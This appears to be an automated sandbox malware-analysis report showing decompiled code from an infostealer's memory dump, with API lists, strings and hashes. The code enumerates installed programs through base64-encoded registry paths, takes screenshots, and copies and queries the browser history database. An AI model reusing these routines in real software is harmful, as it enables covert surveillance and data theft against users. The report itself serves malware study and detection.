                                                                                                                                                                                              				_t334 = _t335;
                                                                                                                                                                                              				_t263 = 0x8f;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t263 = _t263 - 1;
                                                                                                                                                                                              				} while (_t263 != 0);
                                                                                                                                                                                              				_t262 = __eax;
                                                                                                                                                                                              				_t329 =  &_v1009;
                                                                                                                                                                                              				_push(_t334);
                                                                                                                                                                                              				_push(0x416452);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t335;
                                                                                                                                                                                              				E004034E4(__eax);
                                                                                                                                                                                              				_t331 = 0;
                                                                                                                                                                                              				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1016, _t329, 0);
                                                                                                                                                                                              				RegOpenKeyExA(0x80000002, E00403990(_v1016), 0, 0x20019,  &_v8);
                                                                                                                                                                                              				while(RegEnumKeyA(_v8, _t331, _t329, 0x3e9) == 0) {
                                                                                                                                                                                              					E00403D2C( &_v1024,  *_t262);
                                                                                                                                                                                              					_push(_v1024);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v1028);
                                                                                                                                                                                              					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1036, _t329, _t331);
                                                                                                                                                                                              					E00403C98( &_v1032, E00403990(_v1036));
                                                                                                                                                                                              					_push(_v1032);
                                                                                                                                                                                              					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1044, _t329, _t331);
                                                                                                                                                                                              					_push( &_v1044);
                                                                                                                                                                                              					E00403748( &_v1048, 0x3e9, _t329);
                                                                                                                                                                                              					_pop(_t123);
                                                                                                                                                                                              					E00403798(_t123, _v1048);
                                                                                                                                                                                              					E00403C98( &_v1040, E00403990(_v1044));
                                                                                                                                                                                              					_pop(_t265);
                                                                                                                                                                                              					E00407500(0x80000002, _t262, _t265, _v1040);
                                                                                                                                                                                              					_push(_v1028);
                                                                                                                                                                                              					_push(0x416528);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v1052);
                                                                                                                                                                                              					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1060, _t329, _t331);
                                                                                                                                                                                              					E00403C98( &_v1056, E00403990(_v1060));
                                                                                                                                                                                              					_push(_v1056);
                                                                                                                                                                                              					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1068, _t329, _t331);
                                                                                                                                                                                              					_push( &_v1068);
                                                                                                                                                                                              					E00403748( &_v1072, 0x3e9, _t329);
                                                                                                                                                                                              					_pop(_t144);
                                                                                                                                                                                              					E00403798(_t144, _v1072);
                                                                                                                                                                                              					E00403C98( &_v1064, E00403990(_v1068));
                                                                                                                                                                                              					_pop(_t267);
                                                                                                                                                                                              					E00407500(0x80000002, _t262, _t267, _v1064);
                                                                                                                                                                                              					_push(_v1052);
                                                                                                                                                                                              					_push(")");
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					E0040377C(_t262, _v1020);
                                                                                                                                                                                              					_t331 = _t331 + 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t332 = 0;
                                                                                                                                                                                              				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1076, _t329, 0);
                                                                                                                                                                                              				RegOpenKeyExA(0x80000001, E00403990(_v1076), 0, 0x20019,  &_v8);
                                                                                                                                                                                              				while(RegEnumKeyA(_v8, _t332, _t329, 0x3e9) == 0) {
                                                                                                                                                                                              					E00403D2C( &_v1084,  *_t262);
                                                                                                                                                                                              					_push(_v1084);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v1088);
                                                                                                                                                                                              					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1096, _t329, _t332);
                                                                                                                                                                                              					E00403C98( &_v1092, E00403990(_v1096));
                                                                                                                                                                                              					_push(_v1092);
                                                                                                                                                                                              					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1104, _t329, _t332);
                                                                                                                                                                                              					_push( &_v1104);
                                                                                                                                                                                              					E00403748( &_v1108, 0x3e9, _t329);
                                                                                                                                                                                              					_pop(_t178);
                                                                                                                                                                                              					E00403798(_t178, _v1108);
                                                                                                                                                                                              					E00403C98( &_v1100, E00403990(_v1104));
                                                                                                                                                                                              					_pop(_t269);
                                                                                                                                                                                              					E00407500(0x80000001, _t262, _t269, _v1100);
                                                                                                                                                                                              					_push(_v1088);
                                                                                                                                                                                              					_push(0x416528);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v1112);
                                                                                                                                                                                              					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1120, _t329, _t332);
                                                                                                                                                                                              					E00403C98( &_v1116, E00403990(_v1120));
                                                                                                                                                                                              					_push(_v1116);
                                                                                                                                                                                              					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1128, _t329, _t332);
                                                                                                                                                                                              					_push( &_v1128);
                                                                                                                                                                                              					E00403748( &_v1132, 0x3e9, _t329);
                                                                                                                                                                                              					_pop(_t199);
                                                                                                                                                                                              					E00403798(_t199, _v1132);
                                                                                                                                                                                              					E00403C98( &_v1124, E00403990(_v1128));
                                                                                                                                                                                              					_pop(_t271);
                                                                                                                                                                                              					E00407500(0x80000001, _t262, _t271, _v1124);
                                                                                                                                                                                              					_push(_v1112);
                                                                                                                                                                                              					_push(")");
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					E0040377C(_t262, _v1080);
                                                                                                                                                                                              					_t332 = _t332 + 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00403D2C( &_v1140,  *_t262);
                                                                                                                                                                                              				E004070BC(_v1140, _t262, 0x41655c, L"()\r\n",  &_v1136);
                                                                                                                                                                                              				E0040377C(_t262, _v1136);
                                                                                                                                                                                              				E00403D2C( &_v1148,  *_t262);
                                                                                                                                                                                              				E004070BC(_v1148, _t262, 0x41655c, L"\r\n\r\n",  &_v1144);
                                                                                                                                                                                              				E0040377C(_t262, _v1144);
                                                                                                                                                                                              				_pop(_t318);
                                                                                                                                                                                              				 *[fs:eax] = _t318;
                                                                                                                                                                                              				_push(E0041645C);
                                                                                                                                                                                              				E00403B98( &_v1148, 4);
                                                                                                                                                                                              				E00403508( &_v1132, 2);
                                                                                                                                                                                              				E00403B80( &_v1124);
                                                                                                                                                                                              				E004034E4( &_v1120);
                                                                                                                                                                                              				E00403B98( &_v1116, 2);
                                                                                                                                                                                              				E00403508( &_v1108, 2);
                                                                                                                                                                                              				E00403B80( &_v1100);
                                                                                                                                                                                              				E004034E4( &_v1096);
                                                                                                                                                                                              				E00403B98( &_v1092, 4);
                                                                                                                                                                                              				E00403508( &_v1076, 3);
                                                                                                                                                                                              				E00403B80( &_v1064);
                                                                                                                                                                                              				E004034E4( &_v1060);
                                                                                                                                                                                              				E00403B98( &_v1056, 2);
                                                                                                                                                                                              				E00403508( &_v1048, 2);
                                                                                                                                                                                              				E00403B80( &_v1040);
                                                                                                                                                                                              				E004034E4( &_v1036);
                                                                                                                                                                                              				E00403B98( &_v1032, 4);
                                                                                                                                                                                              				return E004034E4( &_v1016);
                                                                                                                                                                                              			}


                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                                • Part of subcall function 00407500: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                                                                                                                • Part of subcall function 00407500: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Open$EnumFreeString$QueryValue
                                                                                                                                                                                              • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                                                                                                                                                                                              • API String ID: 811798878-3013244427
                                                                                                                                                                                              • Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                                                                                                              • Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
                                                                                                                                                                                              • Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E004178B4(int __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, int _a16) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                              				int _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                              				struct HWND__* _v48;
                                                                                                                                                                                              				struct HWND__* _v52;
                                                                                                                                                                                              				struct HWND__* _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				intOrPtr _v124;
                                                                                                                                                                                              				char _v132;
                                                                                                                                                                                              				char _v148;
                                                                                                                                                                                              				char* _v152;
                                                                                                                                                                                              				intOrPtr _v156;
                                                                                                                                                                                              				intOrPtr _v160;
                                                                                                                                                                                              				void* _v176;
                                                                                                                                                                                              				char _v180;
                                                                                                                                                                                              				intOrPtr* _t78;
                                                                                                                                                                                              				struct HDC__* _t100;
                                                                                                                                                                                              				intOrPtr _t107;
                                                                                                                                                                                              				void* _t112;
                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                              				struct HDC__* _t116;
                                                                                                                                                                                              				struct HDC__* _t118;
                                                                                                                                                                                              				void* _t121;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				_push(_t121);
                                                                                                                                                                                              				_push(0x417adb);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t121 + 0xffffff50;
                                                                                                                                                                                              				if( *0x41c868 != 0 &&  *0x41c86c != 0 &&  *0x41c870 != 0 &&  *0x41c874 != 0 &&  *0x41c878 != 0 &&  *0x41c87c != 0 &&  *0x41c880 != 0 &&  *0x41c884 != 0 &&  *0x41c888 != 0 &&  *0x41c88c != 0) {
                                                                                                                                                                                              					_v60 = 1;
                                                                                                                                                                                              					_v56 = 0;
                                                                                                                                                                                              					_v52 = 0;
                                                                                                                                                                                              					_v48 = 0;
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v60);
                                                                                                                                                                                              					_push( &_v20);
                                                                                                                                                                                              					if( *0x41c86c() == 0) {
                                                                                                                                                                                              						_t100 = GetDC(0);
                                                                                                                                                                                              						_t116 = CreateCompatibleDC(0);
                                                                                                                                                                                              						_t112 = CreateCompatibleBitmap(_t100, _v8, _v12);
                                                                                                                                                                                              						SelectObject(_t116, _t112);
                                                                                                                                                                                              						BitBlt(_t116, 0, 0, _v8, _v12, _t100, _v16, _a16, 0xcc0020);
                                                                                                                                                                                              						 *0x41c888(0, 0xffffffff, E00404900( &_v28));
                                                                                                                                                                                              						 *0x41c874(_t112, 0,  &_v24);
                                                                                                                                                                                              						E004177E0(_a8, _t100,  &_v148, _t112, _t116);
                                                                                                                                                                                              						_v180 = 1;
                                                                                                                                                                                              						asm("movsd");
                                                                                                                                                                                              						asm("movsd");
                                                                                                                                                                                              						asm("movsd");
                                                                                                                                                                                              						asm("movsd");
                                                                                                                                                                                              						_t114 = _t112;
                                                                                                                                                                                              						_t118 = _t116;
                                                                                                                                                                                              						_v160 = 1;
                                                                                                                                                                                              						_v156 = 4;
                                                                                                                                                                                              						_v152 =  &_a12;
                                                                                                                                                                                              						 *0x41c884(_v24, _v28,  &_v148,  &_v180);
                                                                                                                                                                                              						_t78 = _v28;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t78 + 0x30))(_t78,  &_v132, 1);
                                                                                                                                                                                              						 *0x41c88c(_v28,  &_v32);
                                                                                                                                                                                              						GlobalFix(_v32);
                                                                                                                                                                                              						E004035D4(_a4, _v124, _v32);
                                                                                                                                                                                              						 *0x41c880(_v24);
                                                                                                                                                                                              						GlobalUnWire(_v32);
                                                                                                                                                                                              						DeleteObject(_t114);
                                                                                                                                                                                              						DeleteDC(_t118);
                                                                                                                                                                                              						ReleaseDC(0, _t100);
                                                                                                                                                                                              						 *0x41c870(_v20);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t107);
                                                                                                                                                                                              				 *[fs:eax] = _t107;
                                                                                                                                                                                              				_push(E00417AE2);
                                                                                                                                                                                              				return E00404900( &_v28);
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00417994
                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041799D
                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004179B6
                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
                                                                                                                                                                                              • GlobalFix.KERNEL32 ref: 00417A80
                                                                                                                                                                                              • GlobalUnWire.KERNEL32(?), ref: 00417AA2
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00417AA8
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00417AAE
                                                                                                                                                                                              • ReleaseDC.USER32 ref: 00417AB6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 914135935-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                              			E004129A4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				long _t73;
                                                                                                                                                                                              				WCHAR* _t86;
                                                                                                                                                                                              				intOrPtr* _t101;
                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                              				intOrPtr* _t105;
                                                                                                                                                                                              				intOrPtr* _t109;
                                                                                                                                                                                              				intOrPtr* _t138;
                                                                                                                                                                                              				void* _t140;
                                                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                                                              				void* _t144;
                                                                                                                                                                                              				intOrPtr* _t152;
                                                                                                                                                                                              				intOrPtr* _t158;
                                                                                                                                                                                              				intOrPtr* _t164;
                                                                                                                                                                                              				void* _t166;
                                                                                                                                                                                              				void* _t178;
                                                                                                                                                                                              				intOrPtr _t198;
                                                                                                                                                                                              				intOrPtr _t200;
                                                                                                                                                                                              				intOrPtr _t213;
                                                                                                                                                                                              				intOrPtr _t217;
                                                                                                                                                                                              				intOrPtr _t218;
                                                                                                                                                                                              				void* _t219;
                                                                                                                                                                                              				void* _t220;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t215 = __esi;
                                                                                                                                                                                              				_t177 = __ebx;
                                                                                                                                                                                              				_t217 = _t218;
                                                                                                                                                                                              				_t178 = 0xb;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t178 = _t178 - 1;
                                                                                                                                                                                              					_t223 = _t178;
                                                                                                                                                                                              				} while (_t178 != 0);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				_t3 =  &_v8; // 0x6f747365
                                                                                                                                                                                              				E004040F4(_t3);
                                                                                                                                                                                              				_push(_t217);
                                                                                                                                                                                              				_push(0x412c71);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t218;
                                                                                                                                                                                              				_t4 =  &_v28; // 0x6f747351
                                                                                                                                                                                              				E00403B80(_t4);
                                                                                                                                                                                              				_push(_t217);
                                                                                                                                                                                              				_push(0x412be7);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t218;
                                                                                                                                                                                              				_t73 = GetTickCount();
                                                                                                                                                                                              				_t5 =  &_v60; // 0x6f747331
                                                                                                                                                                                              				E00406FDC(_t73, __ebx, _t5, __esi, _t223);
                                                                                                                                                                                              				_push(_v60);
                                                                                                                                                                                              				_t7 =  &_v64; // 0x6f74732d
                                                                                                                                                                                              				E00406F1C(_t7, __ebx, __edi, __esi, _t223);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				_t10 =  &_v40; // 0x6f747345
                                                                                                                                                                                              				E0040781C(_v8, _t177, _t10, _t223);
                                                                                                                                                                                              				_t12 =  &_v72; // 0x6f747325
                                                                                                                                                                                              				E004062D8(L"%TEMP%", _t12, _t223);
                                                                                                                                                                                              				_push(_v72);
                                                                                                                                                                                              				_push(0x412ca8);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				_t17 =  &_v44; // 0x6f747341
                                                                                                                                                                                              				E0040781C(_v68, _t177, _t17, _t223);
                                                                                                                                                                                              				_t86 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
                                                                                                                                                                                              				_t20 =  &_v76; // 0x6f747321
                                                                                                                                                                                              				E0040377C(_t20, _v44);
                                                                                                                                                                                              				_t23 =  &_v36; // 0x6f747349
                                                                                                                                                                                              				E00404AFC(_v76, _t177, _t178, _t23, _t215, _t223);
                                                                                                                                                                                              				_t24 =  &_v80; // 0x6f74731d
                                                                                                                                                                                              				E00403D2C(_t24, _v36);
                                                                                                                                                                                              				if(E004076B0(_v80, _t177, _t178) != 0) {
                                                                                                                                                                                              					_t101 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t219 = _t218 + 8;
                                                                                                                                                                                              					__eflags = _t103;
                                                                                                                                                                                              					if(_t103 == 0) {
                                                                                                                                                                                              						_t138 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t220 = _t219 + 0x14;
                                                                                                                                                                                              						__eflags = _t140;
                                                                                                                                                                                              						if(_t140 == 0) {
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t142 =  *0x41b600; // 0x41c790
                                                                                                                                                                                              								_t144 =  *((intOrPtr*)( *_t142))(_v20);
                                                                                                                                                                                              								__eflags = _t144 - 0x64;
                                                                                                                                                                                              								if(_t144 != 0x64) {
                                                                                                                                                                                              									goto L9;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								E004034E4( &_v48);
                                                                                                                                                                                              								E004034E4( &_v52);
                                                                                                                                                                                              								E004034E4( &_v56);
                                                                                                                                                                                              								_t152 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
                                                                                                                                                                                              								_t158 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
                                                                                                                                                                                              								_t164 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
                                                                                                                                                                                              								_t220 = _t220 + 0x18;
                                                                                                                                                                                              								E004036DC( &_v56, _t166);
                                                                                                                                                                                              								_push(_v28);
                                                                                                                                                                                              								_push(E00412D70);
                                                                                                                                                                                              								E00403D2C( &_v84, _v48);
                                                                                                                                                                                              								_push(_v84);
                                                                                                                                                                                              								_push(0x412d78);
                                                                                                                                                                                              								E00403D2C( &_v88, _v52);
                                                                                                                                                                                              								_push(_v88);
                                                                                                                                                                                              								_push(0x412d84);
                                                                                                                                                                                              								E00403D2C( &_v92, _v56);
                                                                                                                                                                                              								_push(_v92);
                                                                                                                                                                                              								_push(L"\r\n\r\n");
                                                                                                                                                                                              								E00403E1C();
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L9:
                                                                                                                                                                                              					_t105 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t105))(_v20);
                                                                                                                                                                                              					_t109 =  *0x41b590; // 0x41c788
                                                                                                                                                                                              					 *((intOrPtr*)( *_t109))(_v16);
                                                                                                                                                                                              					_pop(_t198);
                                                                                                                                                                                              					 *[fs:eax] = _t198;
                                                                                                                                                                                              					E00403BBC(_v12, _v28);
                                                                                                                                                                                              					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_pop(_t213);
                                                                                                                                                                                              					 *[fs:eax] = _t213;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t200);
                                                                                                                                                                                              				 *[fs:eax] = _t200;
                                                                                                                                                                                              				_push(E00412C78);
                                                                                                                                                                                              				_t58 =  &_v92; // 0x6f747311
                                                                                                                                                                                              				E00403B98(_t58, 4);
                                                                                                                                                                                              				_t59 =  &_v76; // 0x6f747321
                                                                                                                                                                                              				E004034E4(_t59);
                                                                                                                                                                                              				_t60 =  &_v72; // 0x6f747325
                                                                                                                                                                                              				E00403B98(_t60, 4);
                                                                                                                                                                                              				_t61 =  &_v56; // 0x6f747335
                                                                                                                                                                                              				E00403508(_t61, 3);
                                                                                                                                                                                              				_t62 =  &_v44; // 0x6f747341
                                                                                                                                                                                              				E00403B98(_t62, 2);
                                                                                                                                                                                              				_t63 =  &_v36; // 0x6f747349
                                                                                                                                                                                              				E004034E4(_t63);
                                                                                                                                                                                              				_t64 =  &_v32; // 0x6f74734d
                                                                                                                                                                                              				E00403B98(_t64, 2);
                                                                                                                                                                                              				_t65 =  &_v8; // 0x6f747365
                                                                                                                                                                                              				return E00403B80(_t65);
                                                                                                                                                                                              			}
















































                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004129E8
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00412C05
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • , xrefs: 00412B98
                                                                                                                                                                                              • .tmp, xrefs: 00412A03
                                                                                                                                                                                              • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
                                                                                                                                                                                              • %TEMP%, xrefs: 00412A23
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                                                                                                                                                                                              • API String ID: 2381671008-351388873
                                                                                                                                                                                              • Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                                                                                                                                              • Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 43%
                                                                                                                                                                                              			E0041256C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				WCHAR* _t86;
                                                                                                                                                                                              				intOrPtr* _t101;
                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                              				intOrPtr* _t105;
                                                                                                                                                                                              				intOrPtr* _t109;
                                                                                                                                                                                              				intOrPtr* _t138;
                                                                                                                                                                                              				void* _t140;
                                                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                                                              				void* _t144;
                                                                                                                                                                                              				intOrPtr* _t152;
                                                                                                                                                                                              				intOrPtr* _t158;
                                                                                                                                                                                              				intOrPtr* _t164;
                                                                                                                                                                                              				void* _t166;
                                                                                                                                                                                              				void* _t178;
                                                                                                                                                                                              				intOrPtr _t198;
                                                                                                                                                                                              				intOrPtr _t200;
                                                                                                                                                                                              				intOrPtr _t213;
                                                                                                                                                                                              				intOrPtr _t217;
                                                                                                                                                                                              				intOrPtr _t218;
                                                                                                                                                                                              				void* _t219;
